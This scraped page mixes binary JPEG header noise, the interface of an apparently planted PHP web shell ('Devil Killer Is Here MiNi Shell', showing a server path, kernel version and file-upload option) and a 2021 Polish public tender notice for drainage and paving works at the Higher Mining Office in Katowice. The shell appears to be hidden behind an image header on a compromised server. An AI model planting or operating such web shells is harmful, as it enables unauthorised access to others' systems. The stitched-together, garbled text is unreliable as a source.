JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210802/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210802/0013382301-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00133823 z dnia 2021-08-02</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Uregulowanie gospodarki wodno-ściekowej wraz z wymianą nawierzchni placów i dróg wewnętrznych wokół budynków Wyższego Urzędu Górniczego w Katowicach przy ul. Poniatowskiego 29, 29a, 31 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Wyższy Urząd Górniczy</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000332245</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Poniatowskiego 31</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Katowice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">40-055</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL22A - Katowicki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@wug.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.wug.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - organ władzy publicznej - organ administracji rządowej (centralnej lub terenowej)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Środowisko</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Uregulowanie gospodarki wodno-ściekowej wraz z wymianą nawierzchni placów i dróg wewnętrznych wokół budynków Wyższego Urzędu Górniczego w Katowicach przy ul. Poniatowskiego 29, 29a, 31 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-916f980b-f11c-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00133823</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-08-02</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00009631/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Uregulowanie gospodarki wodno-ściekowej wraz z wymianą nawierzchni placów i dróg wewnętrznych wokół budynków Wyższego Urzędu Górniczego w Katowicach przy ul. Poniatowskiego 29, 29a, 31.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://portal.smartpzp.pl/wug <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Postępowanie jest prowadzone w<br/>języku polskim. W postępowaniu o udzielenie zamówienia komunikacja między zamawiającym a<br/>wykonawcami, w szczególności składanie ofert, wymiana informacji oraz przekazywanie dokumentów<br/>lub oświadczeń, odbywa się przy użyciu środków komunikacji elektronicznej zapewnionych przez<br/>system zapewniający obsługę procesu udzielania zamówień publicznych za pośrednictwem środków<br/>komunikacji elektronicznej, zwany dalej Systemem. System jest dostępny pod<br/>adresem:https://portal.smartpzp.pl/wug</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Szczegółowe informacje zawiera SWZ, w szczególności rozdziały XII i XIII SWZ.<br/>Poniżej najważniejsze informacje:<br/>Zgodnie z rozdziałem nr XII SWZ:<br/>"4. Przeglądanie i pobieranie publicznej treści dokumentacji postępowania nie wymaga posiadania<br/>konta w Systemie, ani logowania do Systemu.<br/>5. Za pośrednictwem posiadanego w Systemie konta Użytkownika Zewnętrznego, tj. użytkownika<br/>wykonawcy odbywa się komunikacja wykonawcy z zamawiającym w postępowaniu,<br/>w szczególności: przekazywanie dokumentów, oświadczeń, informacji, pytań, wniosków<br/>w ramach postępowania.<br/>6. Za pośrednictwem posiadanego w Systemie konta Jednostki Zamawiającej oraz kont Użytkowników<br/>Wewnętrznych Jednostki Zamawiającej odbywa się komunikacja zamawiającego z wykonawcą w<br/>postępowaniu, w szczególności: przekazywanie wezwań i zawiadomień, informacji, odpowiedzi na<br/>pytania w ramach postępowania."(...)<br/>"12. Do pełnego i prawidłowego korzystania z Systemu przez Użytkowników Zewnętrznych konieczne<br/>jest posiadanie przez co najmniej jednego uprawnionego (do reprezentowania) Użytkownika<br/>Zewnętrznego wykonawcy kwalifikowanego podpisu elektronicznego lub podpisu zaufanego lub 13. Korzystanie z Systemu możliwe jest pod warunkiem spełnienia przez sprzęt, z którego korzystają<br/>użytkownicy wykonawcy, następujących minimalnych wymagań technicznych i specyfiki połączenia -<br/>posiadanie komputera o parametrach umożliwiających zainstalowanie następującego oprogramowania:<br/>1) w zakresie podstawowych funkcjonalności – przegląd, pobieranie i załączanie dokumentów:<br/>a) przeglądarka internetowa Mozilla Firefox ver. 65 i późniejsze, Google Chrome ver. 66<br/>i późniejsze lub Opera w ver. 58 i późniejsze, Microsoft Edge ver 18<br/>i późniejsze, Internet Explorer 11,<br/>b) lista zalecanych przeglądarek internetowych: Google Chrome, Mozilla Firefox,Opera; zalecane jest<br/>używanie najnowszych wersji przeglądarek,<br/>c) system operacyjny Windows 10 i późniejsze;<br/>2) w zakresie składania podpisu kwalifikowanego:<br/>a) zainstalowane środowisko Java w wersji min. 1.8 (jre),<br/>b) w przypadku przeglądarek Opera, Chrome i Firefox należy doinstalować dodatek do przeglądarki<br/>Szafir SDK Web,<br/>c) oprogramowania SzafirHost w systemie operacyjnym.<br/>Instrukcja instalowania oprogramowania wskazanego w punktach a, b i c powyżej znajduje się<br/>w Systemie w zakładce E-learning.<br/>14. Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych<br/>i informacji przekazywanych przy ich użyciu zostały opisane w Regulaminie korzystania z usług<br/>Systemu (Regulamin Portalu e-Usług) dostępnym z poziomu modułu E-learning dla wszystkich<br/>użytkowników Systemu oraz podczas rejestracji konta wykonawcy dla wykonawców. "(...)<br/>"19. Maksymalny rozmiar pojedynczych plików przesyłanych za pośrednictwem Systemu wynosi 100<br/>MB. Za pośrednictwem Systemu można przesłać wiele pojedynczych plików lub plik skompresowany<br/>do archiwum (ZIP) zawierający wiele pojedynczych plików.<br/>20. Dopuszczalne formaty przesyłanych danych tj. plików o wielkości do 100 MB<br/>w formatach .png, .jpg, .jpeg, .gif, .doc, .docx, .xls, .xlsx, .ppt, .pptx, .odt, .ods, .odp, .odf, .pdf, .zip, .rar,<br/>.7zip, .txt, .ath, .xml, .dwg, .xades, .tar, .7z, .eml, .msg."<br/>Zgodnie z rozdziałem XIII SWZ:<br/>"(...)4. Ofertę należy złożyć w języku polskim, sporządzoną pod rygorem nieważności, w formie<br/>elektronicznej (opatrzoną kwalifikowanym podpisem elektronicznym) lub w postaci elektronicznej<br/>opatrzonej podpisem zaufanym lub podpisem osobistym. Treść oferty musi być zgodna z<br/>wymaganiami zamawiającego określonymi w dokumentach zamówienia.(...)"</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zamawiający realizuje obowiązek informacyjny w SWZ klauzula<br/>informacyjna RODO stanowi załącznik nr 1 do SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zamawiający realizuje obowiązek informacyjny w SWZ klauzula<br/>informacyjna RODO stanowi załącznik nr 1 do SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">BAG/09/2021/TP</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia są roboty budowlane obejmujące przebudowę i uporządkowanie<br/>zewnętrznej instalacji kanalizacji sanitarnej i deszczowej – rozdzielenie instalacji kanalizacji<br/>ogólnospławnej, częściowy demontaż nawierzchni, częściowe utwardzenie nawierzchni<br/>kruszywem, odtworzenie naruszonych elementów zagospodarowania terenu (murki, ogrodzenie)<br/>– (zakres podstawowy, część gwarantowana) oraz przebudowę i uporządkowanie zewnętrznej<br/>instalacji elektrycznej (oświetlenie uliczne, stacja ładowania pojazdów), wykonanie zewnętrznej<br/>izolacji przeciwwilgociowej budynków przy ul. Poniatowskiego 29 i 29a, remont i przebudowa<br/>nawierzchni utwardzonych – wyłożenie kostką brukową lub płytami ażurowymi (dróg<br/>wewnętrznych, miejsc postojowych, chodników), wykonanie elementów małej architektury<br/>(stanowisko kontenerów na odpady, odbudowa murków i elementów ogrodzenia) – (zakres<br/>objęty prawem opcji).<br/>1. Termin realizacji zamówienia wynosi: 3 miesiące od dnia zawarcia umowy w przypadku zakresu podstawowego, 3 miesiące od dnia uruchomienia opcji. Uruchomienie opcji nastąpi najpóźniej do dnia 30 kwietnia 2022 roku.<br/>2. Szczegółowe zagadnienia dotyczące terminu realizacji umowy uregulowane są we wzorze umowy, stanowiącym załącznik nr 4 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45110000-1 - Roboty w zakresie burzenia i rozbiórki obiektów budowlanych; roboty ziemne</p> <p class="mb-0">45210000-2 - Roboty budowlane w zakresie budynków</p> <p class="mb-0">45230000-8 - Roboty budowlane w zakresie budowy rurociągów, linii komunikacyjnych i elektroenergetycznych, autostrad, dróg, lotnisk i kolei; wyrównywanie terenu</p> <p class="mb-0">45231300-8 - Roboty budowlane w zakresie budowy wodociągów i rurociągów do odprowadzania ścieków</p> <p class="mb-0">45232440-8 - Roboty budowlane w zakresie budowy rurociągów do odprowadzania ścieków</p> <p class="mb-0">45233000-9 - Roboty w zakresie konstruowania, fundamentowania oraz wykonywania nawierzchni autostrad, dróg</p> <p class="mb-0">45233120-6 - Roboty w zakresie budowy dróg</p> <p class="mb-0">45233260-9 - Roboty budowlane w zakresie dróg pieszych</p> <p class="mb-0">45262420-1 - Wznoszenie konstrukcji obiektów</p> <p class="mb-0">45262500-6 - Roboty murarskie i murowe</p> <p class="mb-0">45262650-2 - Roboty w zakresie okładania</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45311200-2 - Roboty w zakresie instalacji elektrycznych</p> <p class="mb-0">45315600-4 - Instalacje niskiego napięcia</p> <p class="mb-0">45317000-2 - Inne instalacje elektryczne</p> <p class="mb-0">45330000-9 - Roboty instalacyjne wodno-kanalizacyjne i sanitarne</p> <p class="mb-0">45453000-7 - Roboty remontowe i renowacyjne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji:<br/>Zamawiający, korzystając z prawa opcji, określa maksymalną wielkość przedmiotu zamówienia.<br/>Jednocześnie wskazuje, iż minimalny zakres przedmiotu zamówienia – zakres podstawowy<br/>(część gwarantowana) dotyczy robót budowlanych wskazanych w załączniku nr 2 do SWZ.<br/>Zakres przedmiotu zamówienia objęty prawem opcji (część objęta prawem opcji) dotyczy robót<br/>budowlanych wskazanych w załączniku nr 3 do SWZ. Warunkiem skorzystania przez<br/>zamawiającego z prawa opcji będzie posiadanie środków finansowych na zamówienie objęte<br/>prawem opcji. Zamawiający zastrzega sobie możliwość nieskorzystania lub skorzystania z<br/>prawa opcji w niepełnym zakresie. Warunkiem uruchomienia przez zamawiającego prawa opcji<br/>jest złożenie pisemnego oświadczenia woli o korzystaniu z prawa opcji z jednoczesnym<br/>wskazaniem zakresu prawa opcji. W przypadku nieskorzystania przez zamawiającego z prawa<br/>opcji, wykonawcy nie przysługują żadne roszczenia z tego tytułu. Skorzystanie z prawa opcji, tj.<br/>złożenie oświadczenia, o którym mowa powyżej, nastąpi najpóźniej do dnia 30 kwietnia 2022<br/>roku. <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">3 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty zamawiający będzie się kierował<br/>następującymi kryteriami:<br/>- cena ofertowa brutto - znaczenie 80 %,<br/>- okres gwarancji- znaczenie 20 %.<br/>2. Liczba punktów w kryterium – cena ofertowa brutto, będzie obliczana według wzoru:<br/>Cena (C) – waga 80%<br/>C =(cena najniższa brutto*/cena oferty ocenianej brutto) x 100 pkt x 80%<br/>* spośród wszystkich złożonych ofert niepodlegających odrzuceniu, oferty odrzucone nie podlegają<br/>ocenie<br/>1) podstawą przyznania punktów w kryterium „cena” będzie łączna cena ofertowa brutto podana przez<br/>wykonawcę w Formularzu ofertowym,<br/>2) cena ofertowa brutto musi uwzględniać wszelkie koszty jakie wykonawca poniesie<br/>w związku z realizacją przedmiotu zamówienia.<br/>3. Kryterium - okres gwarancji rozpatrywane będzie według deklarowanego przez wykonawcę<br/>w ofercie i podanego w pełnych latach okresu gwarancji na całość przedmiotu zamówienia,<br/>w tym na zastosowane materiały i osprzęt, z zastrzeżeniem, że okres ten nie może być krótszy niż 3<br/>lata, według zasady:<br/>1) minimalny okres gwarancji wynoszący 3 lata – 0 punktów;<br/>2) okres gwarancji 4 lata – 10 punktów;<br/>3) okres gwarancji 5 lat i więcej lat – 20 punktów.<br/>Każdy z wykonawców zobowiązany jest podać okres gwarancji w pełnych latach,<br/>z zastrzeżeniem, że zaoferowany okres gwarancji nie może być krótszy niż wymagane 3 lata.<br/>W przypadku zaoferowania niepełnej liczby lat, nie mniej jednak niż wymagane 3 lata, dla celów obliczenia liczby punktów okres gwarancji zostanie zaokrąglony w dół do pełnej liczby lat.<br/>Jednocześnie do umowy zostanie wpisany faktycznie zaoferowany okres gwarancji.<br/>4. Wyliczenie punktów zostanie dokonane poprzez dodanie liczby punktów uzyskanych w każdym z<br/>ww. kryterium, z dokładnością do dwóch miejsc po przecinku, zgodnie z matematycznymi zasadami<br/>zaokrąglania.<br/>5. Za ofertę najkorzystniejszą uznana zostanie oferta, która uzyska najwyższą ilość punktów<br/>łącznie w obu wskazanych wyżej kryteriach.<br/>6. Jeżeli zamawiający nie będzie mógł dokonać wyboru oferty najkorzystniejszej ze względu na to, że<br/>dwie lub więcej ofert przedstawiać będzie taki sam bilans ceny i okresu gwarancji, zamawiający<br/>wybierze ofertę z niższą ceną.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">80</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym:<br/>zamawiający nie stawia warunku w powyższym zakresie;<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej,<br/>o ile wynika to z odrębnych przepisów:<br/>zamawiający nie stawia warunku w powyższym zakresie;<br/>3) sytuacji ekonomicznej lub finansowej:<br/>zamawiający nie stawia warunku w powyższym zakresie;<br/>4) zdolności technicznej lub zawodowej:<br/>a) wykonawca spełni warunek, jeżeli wykaże, że w okresie ostatnich 5 lat przed upływem terminu<br/>składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał, w<br/>sposób należyty oraz zgodnie z zasadami sztuki budowlanej<br/>i prawidłowo ukończył co najmniej 2 zamówienia, z których każde obejmowało budowę,<br/>przebudowę, modernizację lub remont zewnętrznych instalacji kanalizacji wraz z wykonaniemrobót ogólnobudowlanych obejmujących budowę lub remont nawierzchni utwardzonych, o<br/>wartości co najmniej 600.000,00 PLN brutto każde;<br/>b) dysponuje osobami zdolnymi do wykonania zamówienia, posiadającymi odpowiednie<br/>kwalifikacje i doświadczenie i uczestniczącymi w realizacji zamówienia, tj.:<br/>- dysponuje co najmniej jedną osobą, która będzie uczestniczyć w wykonywaniu zamówienia w<br/>charakterze kierownika budowy, posiadającą uprawnienia<br/>w specjalności konstrukcyjno-budowlanej do kierowania robotami bez ograniczeń, zgodnie z<br/>ustawą z dnia 7 lipca 1994 r. - Prawo budowlane (Dz. U.<br/>z 2020 r. poz. 1333, z późn. zm), zwaną dalej „ustawą – Prawo budowlane”,<br/>oraz rozporządzeniem Ministra Inwestycji i Rozwoju z dnia 29 kwietnia 2019 r.<br/>w sprawie przygotowania zawodowego do wykonywania samodzielnych funkcji technicznych w<br/>budownictwie (Dz. U. poz. 831), zwanym dalej „rozporządzeniem w sprawie samodzielnych<br/>funkcji technicznych w budownictwie”, lub odpowiadające im ważne uprawnienia budowlane,<br/>które zostały wydane na podstawie wcześniej obowiązujących przepisów i jednocześnie przez<br/>co najmniej 18 miesięcy brała udział<br/>w robotach budowlanych prowadzonych przy zabytkach nieruchomych wpisanych do rejestru<br/>lub inwentarza muzeum będącego instytucją kultury zgodnie z art. 37c ustawy z dnia 23 lipca<br/>2003 r. o ochronie zabytków i opiece nad zabytkami;<br/>- dysponuje co najmniej jedną osobą, która będzie uczestniczyć w wykonywaniu zamówienia,<br/>posiadającą uprawnienia do kierowania robotami budowlanymi bez ograniczeń w specjalności<br/>instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych,<br/>wodociągowych i kanalizacyjnych, zgodnie z ustawą - Prawo budowlane oraz rozporządzeniem<br/>w sprawie samodzielnych funkcji technicznych w budownictwie lub odpowiadające im ważne<br/>uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących<br/>przepisów; - dysponuje co najmniej jedną osobą, która będzie uczestniczyć w wykonywaniu zamówienia,<br/>posiadającą uprawnienia do kierowania robotami budowlanymi bez ograniczeń w specjalności<br/>instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych,<br/>zgodnie z ustawą - Prawo budowlane oraz rozporządzeniem w sprawie samodzielnych funkcji<br/>technicznych w budownictwie lub odpowiadające im ważne uprawnienia budowlane, które<br/>zostały wydane na podstawie wcześniej obowiązujących przepisów;<br/>- dysponuje co najmniej jedną osobą, która będzie uczestniczyć w wykonywaniu zamówienia,<br/>posiadającą uprawnienia do kierowania robotami budowlanymi bez ograniczeń w specjalności<br/>inżynieryjnej drogowej, zgodnie z ustawą - Prawo budowlane oraz rozporządzeniem w sprawie<br/>samodzielnych funkcji technicznych<br/>w budownictwie lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane 